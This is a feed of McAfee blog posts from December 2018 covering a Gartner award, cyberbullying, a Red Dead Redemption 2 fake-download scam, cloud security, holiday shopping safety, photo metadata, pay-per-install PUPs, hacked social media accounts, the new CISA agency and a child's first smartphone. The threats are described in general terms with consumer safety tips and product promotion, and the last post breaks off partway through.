McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms https://securingtomorrow.mcafee.com/business/endpoint-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-endpoint-protection-platforms/ https://securingtomorrow.mcafee.com/business/endpoint-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-endpoint-protection-platforms/#respond Fri, 07 Dec 2018 17:47:10 +0000 https://securingtomorrow.mcafee.com/?p=92988

We are excited to announce that McAfee has been recognized as a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms.  McAfee takes great pride in this distinction, as we feel that real-world feedback from our customers is the driving force behind the recognition and that they have spoken loudly about the value they […]

The post McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms appeared first on McAfee Blogs.

]]>

We are excited to announce that McAfee has been recognized as a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms.  McAfee takes great pride in this distinction, as we feel that real-world feedback from our customers is the driving force behind the recognition and that they have spoken loudly about the value they are receiving from our products.

In its announcement, Gartner explains, “Since October 2015, more than 100,000 reviews across more than 300 markets have been posted to Gartner Peer Insights. In markets where there is enough data, Gartner Peer Insights recognizes the vendors who are the most highly rated by their customers through the Customers’ Choice distinction. This peer-rated distinction can be a useful complement to expert opinion, as it focuses on direct peer experiences of implementing and operating a solution.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors.

 

 

 

For this distinction, a vendor must have a minimum of 50 approved ratings with an average overall rating of 4.2 stars or higher. McAfee received 651 reviews and an average 4.4 rating out of 5 total for the Endpoint Protection Platforms market as of November 19th, 2018.

Here are some excerpts from customers that contributed to the distinction:

“This is what an Endpoint Security Solution should look like”

 Cyber Security Analyst in the Government Industry

“McAfee ENS has been a complete game changer in the world [of] endpoint security.”

Infrastructure and Operations in the Retail Industry

“Seamless upgrade from legacy products to ENS, ePO is probably the best management console I’ve used for any product I’ve used”

Sr. Desktop Engineer in the Services Industry

And those are just a few. You can read more reviews for McAfee Endpoint Security on our web site and on the Gartner site.

On behalf of McAfee, I would like to thank all of our customers who took the time to share their experiences. We are delighted to be a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms and we believe that it is your valuable feedback which made it possible. To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights Customers’ Choice announcement page.

 

  • Gartner Peer Insights’ Customers’ Choice for Endpoint Security and Protection Software announcement November 19, 2018

 

The Gartner Peer Insights Customers’ Choice logo is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

The post McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-endpoint-protection-platforms/feed/ 0
Cyberbullying’s Impact on Both Society and Security https://securingtomorrow.mcafee.com/consumer/cyberbullyings-impact-society-and-security/ https://securingtomorrow.mcafee.com/consumer/cyberbullyings-impact-society-and-security/#respond Fri, 07 Dec 2018 11:56:50 +0000 https://securingtomorrow.mcafee.com/?p=92936

In my last piece, I broke down the who, what, and how of cyberbullying, as most people are unaware of how the problem actually takes a variety of forms. With multiple types of cyberbullies and methods for digital bullying impacting kids today, the phenomenon’s effect on society is nothing short of powerful. In fact, according […]

The post Cyberbullying’s Impact on Both Society and Security appeared first on McAfee Blogs.

]]>

In my last piece, I broke down the who, what, and how of cyberbullying, as most people are unaware of how the problem actually takes a variety of forms. With multiple types of cyberbullies and methods for digital bullying impacting kids today, the phenomenon’s effect on society is nothing short of powerful. In fact, according to statistics reported by ABC News, nearly 30 percent of students are either bullies or victims of bullying. The problem affects many and has many ramifications, both on society and the way we approach security. Let’s take a look.

Side Effects of Cyberbullying

The victims of cyberbullying will likely never view the internet the same way again, as their digital identities could be potentially damaged by aggressive online attacks. If subject to cyberbullying, it’s likely a victim’s online identity will reshape entirely.

But beyond that, the most blatant and concerning effect of cyberbullying is how it can impact the victim’s mental health. Faced with a constant barrage of insults and harassment, the victims of cyberbullying often grapple with negative thoughts, insecurity, and even depression after their attacks occur. In fact, according to Penn State, 30% of individuals who were cyberbullied turned toward self-harming behaviors and began having suicidal thoughts.

The digital impact not only extends to the mental sphere, but to the physical one too. Beyond changing someone’s digital identity and mental health state, cyberbullying can also cause kids to change schools and families to relocate. 

Securing Both the Digital and the Physical

With cyberbullying’s impact extending so far past the digital plane, that means it also changes the way we approach securing innocent internet users everywhere from cyberbullying. But with cyberbullying giving old schoolyard bullies a new playing field, we’re all now faced with the conundrum – how do you prevent both the digital and physical ramifications of the issue?

Now, it can be challenging to prevent cyberbullying from having mental and physical effects on victims. For parents whose kids have been subject to cyberbullying, there are quite a few hotlines and online resources available. Additionally, my previous blog outlined a few talking points parents can cover off in order to weave cybersecurity into their family’s dialogue.

As for the digital, there are a handful of tools consumers can equip themselves with set up preventative measures and secure their family’s devices from malicious online activity. Family safety solutions like McAfee Safe Family can help parents set rules and time limits for apps and websites, as well as see what their kids are doing online. There are also tools like McAfee WebAdvisor, which can help prevent kids from entering any sites where malicious characters or content live.

For parents, educators, or even law enforcement, it can be a struggle to comprehend the issues that stem from cyberbullying, let alone have effective means to deal with it. Accurate prevention is possible, but there doesn’t seem to be enough tools, methods, or measures to get there yet.

Therefore, we must all step up and look into the right research and technology required to stop cyberbullying. Only then will both the digital and physical worlds be free of the effects of these nasty online bullies.

To learn more about family safety and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post Cyberbullying’s Impact on Both Society and Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/cyberbullyings-impact-society-and-security/feed/ 0
Attention Red Dead Redemption 2 Players: Dodge This New Download Scam https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/red-dead-redemption-2-scam/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/red-dead-redemption-2-scam/#respond Thu, 06 Dec 2018 17:00:58 +0000 https://securingtomorrow.mcafee.com/?p=92879

Rockstar Games’ Red Dead Redemption 2 has struck a popular chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity among cybercriminals as well. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the online game, while simultaneously making a […]

The post Attention Red Dead Redemption 2 Players: Dodge This New Download Scam appeared first on McAfee Blogs.

]]>

Rockstar Games’ Red Dead Redemption 2 has struck a popular chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity among cybercriminals as well. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the online game, while simultaneously making a profit on these downloads.

You’re probably wondering how exactly this scam works. It first begins with cybercriminals planting their phony download traps in ads on platforms like YouTube, Twitter, and blog postings. With other, less sophisticated scams, a user would be prompted to install several bundled applications at this point, each one generating revenue for the scammer. But this scheme works a little bit differently. When the user clicks on the “download” button, they are presented with a fake install screen showing the progression of the game’s download process.  The fake install takes about an hour to complete, further giving the illusion that a large file is actually being downloaded on the user’s device.

Once the fake installation is complete, the user is asked to enter a nonexistent license key (a pattern of numbers and/or letters provided to licensed users of a software program). If a user clicks on one of the buttons on this screen, they are redirected to a website asking for human verification in the form of surveys and questionnaires. These surveys trick the user into divulging their personal information for the cybercriminal’s disposal. What’s more, the scammer earns revenue for their malicious acts.

Because this scheme tricks users into handing over their personal information, it affects a victim’s overall privacy. Luckily, there are steps users can take to combat this threat:

  • Browse with caution. Many scammers target gamers through popular websites like YouTube and Twitter to push out malicious content. Use discretion when browsing these websites.
  • Only download content from trusted sources. If you come across a download offer that seems too good to be true, it probably is. Only download software from legitimate sources and avoid sites if you can’t tell whether they are trustworthy or not.
  • Use security software to browse the internet. Sometimes, it can be hard to distinguish whether a site is malicious or not. Security solutions like McAfee WebAdvisor can detect the URLs and scam installers associated with this threat.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Red Dead Redemption 2 Players: Dodge This New Download Scam appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/red-dead-redemption-2-scam/feed/ 0
Extending Security to the Public Cloud is the Easy Part https://securingtomorrow.mcafee.com/business/extending-security-to-the-public-cloud-is-the-easy-part/ https://securingtomorrow.mcafee.com/business/extending-security-to-the-public-cloud-is-the-easy-part/#respond Thu, 06 Dec 2018 16:00:57 +0000 https://securingtomorrow.mcafee.com/?p=92929

“The biggest challenge of securing the public cloud isn’t technical.” That’s the opinion of an IT security analyst at a large U.S. government contractor. He should know. In the last year, his company rolled out a multi-tiered cloud environment, with instances in Amazon Web Services (AWS) as well as on premises. For this company, which […]

The post Extending Security to the Public Cloud is the Easy Part appeared first on McAfee Blogs.

]]>

“The biggest challenge of securing the public cloud isn’t technical.”

That’s the opinion of an IT security analyst at a large U.S. government contractor. He should know. In the last year, his company rolled out a multi-tiered cloud environment, with instances in Amazon Web Services (AWS) as well as on premises.

For this company, which administers federal and state programs that directly assist a broad sector of the American population, leveraging the public cloud made sense. Using the cloud would reduce total cost of ownership (TCO), provide clients and end users with easier access to their information via web-based portals, and enable quickly ramping up or scaling down bandwidth requirements to support the widely fluctuating number of users across projects. However, cybersecurity was a critical concern.

Fast, easy deployment of cloud protection and highly granular policies

Before launching its first contracted project using a public cloud, the company thoroughly researched its cloud security options. Based on its research, the company decided to implement McAfee Cloud Workload Security to bolster the security of data within AWS. “With McAfee Cloud Workload Security, we can get very granular with our policies,” the systems analyst said. “It is a very powerful tool in [the cloud] environment. We are able to be very proactive in pushing out to endpoints [in the cloud] what they need.”

By bridging native AWS API driven data sources such as GuardDuty with a cloud workload protection platform like McAfee Cloud Workload Security (CWS), tenants of AWS can use the data-rich sources of AWS within CWS manage and secure mission critical workloads with advanced security from a single console.

Since the company’s security team already relied on the McAfee integrated security platform and McAfee ePolicy Orchestrator (McAfee ePO) management console, deploying McAfee Cloud Workload Security was simple and took less than a week. Once the solution and its components were implemented, the company had end-to-end visibility into all cloud workloads and their underlying platforms plus insights into weak security controls, unsafe firewall and encryption settings, and indicators of compromise (IoCs).

Small IS team easily adds management of cloud protection

The company supports its 15,000 professionals and 35,000 endpoints with an information security team of only five people spread across three locations. Such a lean staff is possible primarily thanks to McAfee ePO. Adding cloud protection to the company’s security arsenal required no additional staff. The team simply extended its ability to easily set policies and monitor and manage endpoint protection from on premises into the cloud.

“Whether on premises or in the cloud, we can easily add or customize policies to meet the security needs of each specific contract and project,” the systems analyst said. “McAfee has made it very easy to bring in new workloads.” For example, one of the company’s projects involves multiple federal agencies and multiple types of workloads. These workloads include SQL and Oracle databases, imaging software (since volumes of documents must be stored digitally for years), and agency-specific and contract-specific applications.

The real challenge of securing the cloud

So, what is the difficult part of securing the public cloud?

According to the systems analyst, “The biggest challenge is overcoming the perception that the cloud can’t be secured. We have had to educate both internally and externally that we can extend our existing threat defenses beyond our physical infrastructure to the public cloud. Education is ongoing, but our success thus far at securely leveraging the public cloud is converting the naysayers.”

To read a case study and learn about how the company relies on McAfee to secure the cloud, click here. To watch a video of the systems analyst talking about his experience with McAfee, please view below.

The post Extending Security to the Public Cloud is the Easy Part appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/extending-security-to-the-public-cloud-is-the-easy-part/feed/ 0
Avoid Falling Prey to Online Shopping Bait This Festive Season https://securingtomorrow.mcafee.com/consumer/avoid-falling-prey-to-online-shopping-bait-this-festive-season/ https://securingtomorrow.mcafee.com/consumer/avoid-falling-prey-to-online-shopping-bait-this-festive-season/#respond Wed, 05 Dec 2018 18:53:42 +0000 https://securingtomorrow.mcafee.com/?p=92941

For a moment, I thought this crazy friend of mine had finally lost it. She was staring at her laptop screen, multiple sites open, checking out various apparels at once and muttering under her breath. “Is there a problem?” I hesitantly asked. “I have to attend this destination wedding and they have theme parties, and […]

The post Avoid Falling Prey to Online Shopping Bait This Festive Season appeared first on McAfee Blogs.

]]>

For a moment, I thought this crazy friend of mine had finally lost it. She was staring at her laptop screen, multiple sites open, checking out various apparels at once and muttering under her breath.

Is there a problem?” I hesitantly asked.

I have to attend this destination wedding and they have theme parties, and I don’t have anything to wear in the required colours!” she wailed.

Ah well! Hence the shopping websites.” I realized.

Well, two heads are better than one, they say, and together we made all the purchases in record time. Needless to say, I insisted she used a secure device, limited her searches to trusted websites (using McAfee WebAdvisor), read the reviews and used prepaid credit cards. Cyber safety first and always.

But the ordeal was far from over. “You are Godsent! Now help me search for gifts!

While most of the world celebrates the year-end period as the Festive Season, we in India have a bigger reason to shop- It’s the Shaadi (marriage) season as well! It’s that time of the year when everyone seems to be getting married- resulting in endless parties, snarling traffic, overcrowded shops and packed salons. With most women juggling home and professions, fitting in shopping becomes a tough task. Online shopping is therefore the perfect solution for time-challenged urbanites.

And you can hardly blame them. As they sip their chai after a stressful day, they can simultaneously choose and place their orders and it’s done! No wonder the e-commerce market in India is expected to reach US$ 64 billion by 2020, as per a report by India Brand Equity Foundation!

Unfortunately, when it comes to online shopping, consumers are more concerned about finding a bargain deal and making the most of ‘Flash’ sales than their online security. They risk the dangers of hacking, being scammed and having their personal details and banking credentials stolen in their haste to make a good buy.

The Survey

Recently, McAfee conducted a survey, Holiday Stresses, which revealed the risky habits of online shoppers. The survey found that though consumers are aware of potential risks of online shopping, they still preferred it to the traditional system. It is interesting to note that 77 percent of respondents say that shopping during festive season induces increased financial stress!

The Online Shopping Trap

So, what kind of risks are consumers taking to get the best deals or while shopping in a hurry online?

  • 30% said that they would share their home address
  • 45% would share their phone numbers
  • 19% would risk sharing their bank details
  • 68% are willing to use a website they are unfamiliar with

 The Positives

But all is not lost. Indian shoppers are evolving to adopt safer online buying habits. Wow!

  • Nearly 74% say they would research an unfamiliar site and establish its authenticity before making purchases
  • 55% said they will not make a purchase over an unsecure Wi-Fi connection
  • 55% check their bank statements more often during the holiday festive season
  • 59% consumers would report receiving a phishing email

McAfee shares easy tips to help you stay safe while shopping online:

  • Always connect to public Wi-Fi with caution. Public Wi-Fi might seem like a good idea, but if consumers are not careful, they could be unknowingly be exposing personal information or credit card details to cybercriminals who are snooping on the network. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. One of the easiest ways for a cybercriminal to compromise their victim is by using phishing emails to lure consumers into clicking links for products or services that could lead to malware, or a phony website designed to steal personal information. If the deal seems too good to be true, or the email was not expected it’s always best to check directly with the source.
  • Browse with security protection. Use comprehensive security protection, like McAfee Total Protection, which can help keep devices protected against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor which can help identify malicious websites.

Let not financial or data losses mar the joys of the festive season for you and your loved ones. Take charge of your digital lives. Just like you secure your house, car and other belongings, similarly, secure your devices and use trusted websites for shopping.

Have a great time folks!

 

The post Avoid Falling Prey to Online Shopping Bait This Festive Season appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/avoid-falling-prey-to-online-shopping-bait-this-festive-season/feed/ 0
Are Your Online Photos Sharing More Than You Think? https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/are-your-online-photos-sharing-more-than-you-think-3/ https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/are-your-online-photos-sharing-more-than-you-think-3/#respond Tue, 04 Dec 2018 22:13:59 +0000 https://securingtomorrow.mcafee.com/?p=92981 We all share photos online: photos of our kids, photos of our trips, and photos of our meals. We think we are sharing memorable experiences with our friends and family, but are we sharing more with the public than we intend? What if hidden metadata could reveal dangerous details? In episode 20 of “Hackable?”, a […]

The post Are Your Online Photos Sharing More Than You Think? appeared first on McAfee Blogs.

]]>

We all share photos online: photos of our kids, photos of our trips, and photos of our meals. We think we are sharing memorable experiences with our friends and family, but are we sharing more with the public than we intend? What if hidden metadata could reveal dangerous details?

In episode 20 of “Hackable?”, a white-hat hacker follows the trail of digital breadcrumbs that Geoff’s publicly-shared photos have left behind. Listen and learn just what Geoff is really sharing. Find out if your shared photos put you at risk!

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this eye-opening episode.

 


{
"metadata": {
"id": "dcb36b7f-b1c8-46e5-ab4d-2fa17faac523",
"version": "1.0",
"ep": "ta",
"lang": "en-us",
"original-url": "https://securingtomorrow.mcafee.com/consumer/are-your-online-photos-sharing-more-than-you-think/",
"author": "Gary Davis",
"author-page": "https://securingtomorrow.mcafee.com/author/gary-davis/",
"category": "Consumer Threat Notices",
"draft": "false",
"authordetail": "Gary Davis is Chief Consumer Security Evangelist. Through a consumer lens, he partners with internal teams to drive strategic alignment of products with the needs of the security space. Gary also provides security education to businesses and consumers by distilling complex security topics into actionable advice. Follow Gary Davis on Twitter at @garyjdavis",
"tinyimage": "https://securingtomorrow.mcafee.com/wp-content/uploads/2018/12/Ep20-cropped.jpg",
"feedimageurl": "https://securingtomorrow.mcafee.com/wp-content/uploads/2018/12/Ep20-cropped.jpg",
"pubDate": "Tue 04 Dec 2018 12:35:48 +0000"
}
}

The post Are Your Online Photos Sharing More Than You Think? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/are-your-online-photos-sharing-more-than-you-think-3/feed/ 0
Are Your Online Photos Sharing More Than You Think? https://securingtomorrow.mcafee.com/consumer/are-your-online-photos-sharing-more-than-you-think/ https://securingtomorrow.mcafee.com/consumer/are-your-online-photos-sharing-more-than-you-think/#respond Tue, 04 Dec 2018 17:00:48 +0000 https://securingtomorrow.mcafee.com/?p=92885

We all share photos online: photos of our kids, photos of our trips, and photos of our meals. We think we are sharing memorable experiences with our friends and family, but are we sharing more with the public than we intend? What if hidden metadata could reveal dangerous details? In episode 20 of “Hackable?”, a […]

The post Are Your Online Photos Sharing More Than You Think? appeared first on McAfee Blogs.

]]>

We all share photos online: photos of our kids, photos of our trips, and photos of our meals. We think we are sharing memorable experiences with our friends and family, but are we sharing more with the public than we intend? What if hidden metadata could reveal dangerous details?

In episode 20 of “Hackable?”, a white-hat hacker follows the trail of digital breadcrumbs that Geoff’s publicly-shared photos have left behind. Listen and learn just what Geoff is really sharing. Find out if your shared photos put you at risk!

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this eye-opening episode.

 

The post Are Your Online Photos Sharing More Than You Think? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/are-your-online-photos-sharing-more-than-you-think/feed/ 0
Are Your Online Photos Sharing More Than You Think? https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/are-your-online-photos-sharing-more-than-you-think-2/ https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/are-your-online-photos-sharing-more-than-you-think-2/#respond Tue, 04 Dec 2018 17:00:29 +0000 https://securingtomorrow.mcafee.com/?p=92888

We all share photos online: photos of our kids, photos of our trips, and photos of our meals. We think we are sharing memorable experiences with our friends and family, but are we sharing more with the public than we intend? What if hidden metadata could reveal dangerous details? In episode 20 of “Hackable?”, a […]

The post Are Your Online Photos Sharing More Than You Think? appeared first on McAfee Blogs.

]]>

We all share photos online: photos of our kids, photos of our trips, and photos of our meals. We think we are sharing memorable experiences with our friends and family, but are we sharing more with the public than we intend? What if hidden metadata could reveal dangerous details?

In episode 20 of “Hackable?”, a white-hat hacker follows the trail of digital breadcrumbs that Geoff’s publicly-shared photos have left behind. Listen and learn just what Geoff is really sharing. Find out if your shared photos put you at risk!

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this eye-opening episode.

 

The post Are Your Online Photos Sharing More Than You Think? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/are-your-online-photos-sharing-more-than-you-think-2/feed/ 0
Software Company WakeNet AB Discovered Spreading PUPs to Users https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/wakenet-ab-pups-users/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/wakenet-ab-pups-users/#respond Tue, 04 Dec 2018 05:01:48 +0000 https://securingtomorrow.mcafee.com/?p=92891

Pay-per-install, or PPI for short, is a type of software program that presents users with third-party offers while they are in the middle of another download. If a user clicks on the third-party advertisement, the software developer earns money from the download. One specific PPI program has caught the attention of our McAfee ATR team, […]

The post Software Company WakeNet AB Discovered Spreading PUPs to Users appeared first on McAfee Blogs.

]]>

Pay-per-install, or PPI for short, is a type of software program that presents users with third-party offers while they are in the middle of another download. If a user clicks on the third-party advertisement, the software developer earns money from the download. One specific PPI program has caught the attention of our McAfee ATR team, as they recently investigated a company that has taken advantage of this software and is using deceptive techniques to spread malicious files. Meet WakeNet AB, a Swedish pay-per-install software developer that has generated a large amount of revenue – even more so than some of the most prevalent ransomware families – from spreading PUPs (potentially unwanted programs).

So, how does WakeNet AB infect users’ devices with PUPs? WakeNet sets up PPI sites to entice affiliate hackers to spread malicious files and adware. WakeNet’s most recent distribution vessel is the site FileCapital. FileCapital provides affiliate hackers with a variety of “marketing tools” such as embedded movies, landing pages, banners, and buttons. These deceptive tools are intended to coax victims into installing bundled applications that house different PUPs. Victims may install these applications because they are disguised as legitimate programs. For example, a user may think they are installing a helpful performance cleaner onto their computer. What they don’t know is that the “performance cleaner” is actually disguising other malicious files that could lead to irritating adverts and decreased computer performance.

As of now, it seems unlikely that PUP development will slow since it helps their distributors earn a considerable amount of money. With that said, it’s important now more than ever for users to be aware of the security risks involved with PUPs like the ones spread by WakeNet’s FileCapital. Check out the following tips to better protect yourself from this threat:

  • Click with caution. Be wary of pop-ups and websites asking you to click on items like movie playbacks and other software downloads. These items could infect your device with annoying adverts and malware.
  • Only download software from trusted sources. If you receive a pop-up asking you to update or install software, be vigilant. Adware and PUPs are often disguised as legitimate sites or software companies. Your best bet is to play it safe and go directly to the source when updating or installing new software.
  • Use a robust security software. Using a security solution like McAfee Total Protection could help protect your device from exposure to PUPs that have been spread by WakeNet’s FileCapital. McAfee Total Protection blocks auto-play videos on websites that decrease computer performance and warns you of risky websites and links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Software Company WakeNet AB Discovered Spreading PUPs to Users appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/wakenet-ab-pups-users/feed/ 0
What To Do When Your Social Media Account Gets Hacked https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/social-media-account-hacked/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/social-media-account-hacked/#respond Mon, 03 Dec 2018 17:00:15 +0000 https://securingtomorrow.mcafee.com/?p=92869

You log in to your favorite social media site and notice a string of posts or messages definitely not posted by you. Or, you get a message that your account password has been changed, without your knowledge. It hits you that your account has been hacked. What do you do? This is a timely question […]

The post What To Do When Your Social Media Account Gets Hacked appeared first on McAfee Blogs.

]]>

You log in to your favorite social media site and notice a string of posts or messages definitely not posted by you. Or, you get a message that your account password has been changed, without your knowledge. It hits you that your account has been hacked. What do you do?

This is a timely question considering that social media breaches have been on the rise. A recent survey revealed that 22%of internet users said that their online accounts have been hacked at least once, while 14% reported they were hacked more than once. And, earlier this year Facebook itself got hacked, exposing the identity information of 50 million users.

Your first move—and a crucial one—is to change your password right away, and notify your connections that your account has been hacked. This way your friends know not to click on any suspicious posts or messages that appear to be coming from you because they might contain malware or phishing attempts. But that’s not all. There may be other, hidden threats to having your social media account hacked.

The risks associated with a hacker poking around your social media have a lot to do with how much personal information you share. Does your account include personal information that could be used to steal your identity, or guess your security questions on other accounts?

These could include your date of birth, address, hometown, or names of family members and pets. Just remember, even if you keep your profile locked down with strong privacy settings, once the hacker logs in as you, everything you have posted is up for grabs.

You should also consider whether the password for the compromised account is being used on any of your other accounts, because if so, you should change those as well. A clever hacker could easily try your email address and known password on a variety of sites to see if they can log in as you, including on banking sites.

Next, you have to address the fact that your account could have been used to spread scams or malware. Hackers often infect accounts so they can profit off clicks using adware, or steal even more valuable information from you and your contacts.

You may have already seen the scam for “discount Ray-Ban” sunglasses that plagued Facebook a couple of years ago, and recently took over Instagram. This piece of malware posts phony ads to the infected user’s account, and then tags their friends in the post. Because the posts appear in a trusted friend’s feed, users are often tricked into clicking on it, which in turn compromises their own account.

So, in addition to warning your contacts not to click on suspicious messages that may have been sent using your account, you should flag the messages as scams to the social media site, and delete them from your profile page.

Finally, you’ll want to check to see if there are any new apps or games installed to your account that you didn’t download. If so, delete them since they may be another attempt to compromise your account.

Now that you know what do to after a social media account is hacked, here’s how to prevent it from happening in the first place.

How To Keep Your Social Accounts Secure

  • Don’t click on suspicious messages or links, even if they appear to be posted by someone you know.
  • Flag any scam posts or messages you encounter on social media to the website, so they can help stop the threat from spreading.
  • Use unique, complicated passwords for all your accounts.
  • If the site offers multi-factor authentication, use it, and choose the highest privacy setting available.
  • Avoid posting any identity information or personal details that might allow a hacker to guess your security questions.
  • Don’t log in to your social accounts while using public Wi-Fi, since these networks are often unsecured and your information could be stolen.
  • Always use comprehensive security software that can keep you protected from the latest threats.
  • Keep up-to-date on the latest scams and malware threats

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What To Do When Your Social Media Account Gets Hacked appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/social-media-account-hacked/feed/ 0
New DHS Agency Will Provide Needed Emphasis on Cybersecurity https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/new-dhs-agency-will-provide-needed-emphasis-on-cybersecurity/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/new-dhs-agency-will-provide-needed-emphasis-on-cybersecurity/#respond Mon, 03 Dec 2018 14:00:54 +0000 https://securingtomorrow.mcafee.com/?p=92843

Cybersecurity is playing an increasingly greater role in our government and economy. As our world becomes more interconnected, the cyberthreat landscape is growing and rapidly evolving. To address both physical threats and cyberthreats, the leading federal agency must have the flexibility and resources to quickly mitigate any potential interruptions or harm. Last week, a critical […]

The post New DHS Agency Will Provide Needed Emphasis on Cybersecurity appeared first on McAfee Blogs.

]]>

Cybersecurity is playing an increasingly greater role in our government and economy. As our world becomes more interconnected, the cyberthreat landscape is growing and rapidly evolving. To address both physical threats and cyberthreats, the leading federal agency must have the flexibility and resources to quickly mitigate any potential interruptions or harm.

Last week, a critical step was taken in how the Department of Homeland Security (DHS) manages cybersecurity. The long-awaited Cybersecurity and Infrastructure Security Agency (CISA) Act was signed into law by the president, reorganizing the former National Protection and Programs Directorate (NPPD) into CISA. The permanent establishment of a stand-alone federal agency equipped to deal with cyberthreats is long overdue and welcome among the cybersecurity community.

CISA will be its own department within DHS, similar to the Transportation Security Administration (TSA), and will be led by cybersecurity expert, NPPD Under Secretary Christopher C. Krebs, who has had a distinguished career in both the public and private sectors. Establishing CISA as a stand-alone agency within DHS elevates both the mission of cybersecurity in the federal government and cybersecurity’s importance and solidifies the position of cybersecurity in our economy.

This is a smart decision on the part of Congress and the White House. It will help the newly created agency outline its priorities, advocate for a separate budget, and further develop recruitment efforts. CISA’s leaders will have the ability to continue to drive a culture of cybersecurity within our federal agencies and workforce while enhancing their capabilities to partner with the private sector to address our nation’s most critical cybersecurity threats.

McAfee looks forward to continuing to work with Christopher C. Krebs and his able team, led by CISA Assistant Director for Cybersecurity Jeanette Manfra.

 

The post New DHS Agency Will Provide Needed Emphasis on Cybersecurity appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/new-dhs-agency-will-provide-needed-emphasis-on-cybersecurity/feed/ 0
First Smartphone: Are You Putting Cyberbullies Under the Tree This Year? https://securingtomorrow.mcafee.com/consumer/family-safety/first-smartphone-are-you-putting-cyberbullies-under-the-tree-this-year/ https://securingtomorrow.mcafee.com/consumer/family-safety/first-smartphone-are-you-putting-cyberbullies-under-the-tree-this-year/#respond Sat, 01 Dec 2018 15:00:13 +0000 https://securingtomorrow.mcafee.com/?p=92850

There’s pressure — lots of pressure. And not the typical I-want-a-bike or a doll-that-poops kind of pressure your kids may have foisted upon you just a few Christmases ago. No, this is the big leagues. Your child wants his or her first smartphone to show up under the tree this year. Is your son or daughter […]

The post First Smartphone: Are You Putting Cyberbullies Under the Tree This Year? appeared first on McAfee Blogs.

]]>

first smartphone

There’s pressure — lots of pressure. And not the typical I-want-a-bike or a doll-that-poops kind of pressure your kids may have foisted upon you just a few Christmases ago. No, this is the big leagues. Your child wants his or her first smartphone to show up under the tree this year. Is your son or daughter ready? Bigger question: Are you ready?

A first smartphone is a big step in a family that can’t be unstepped. Because it’s not about what a phone used to be about, which is dialing the number of a person you need to speak with. Today, giving your child a cell phone unlocks a hidden wardrobe door that leads to a whole new Narnia-like world abounding in both hills of goodness and valleys of emotional punches.

A first cell phone isn’t a casual purchase. Besides the financial investment (these things aren’t cheap), there’s a family dynamic that will likely change and a peer-to-peer dynamic that will go through its tumultuous metamorphosis.

Here are a few things to consider and talk through with your family before making your final decision to purchase that first smartphone.

Family talking points

first smartphone

  1. Maturity milestones. A phone is a small computer your child will carry in his or her pocket from this point forward. Has your child demonstrated maturity in other areas? Can he or she stay home alone responsibly for short periods? Does your child take care of his or her possessions, complete chores, and homework on time and without you nagging? Does your child earn/save/spend his or her allowance in a mature way? Does your child show empathy for others or deal with conflict well? These milestones are worth examining. If you feel uneasy about your child’s overall maturity, you might consider setting some goals to move your child toward cell phone ownership sometime in the future.
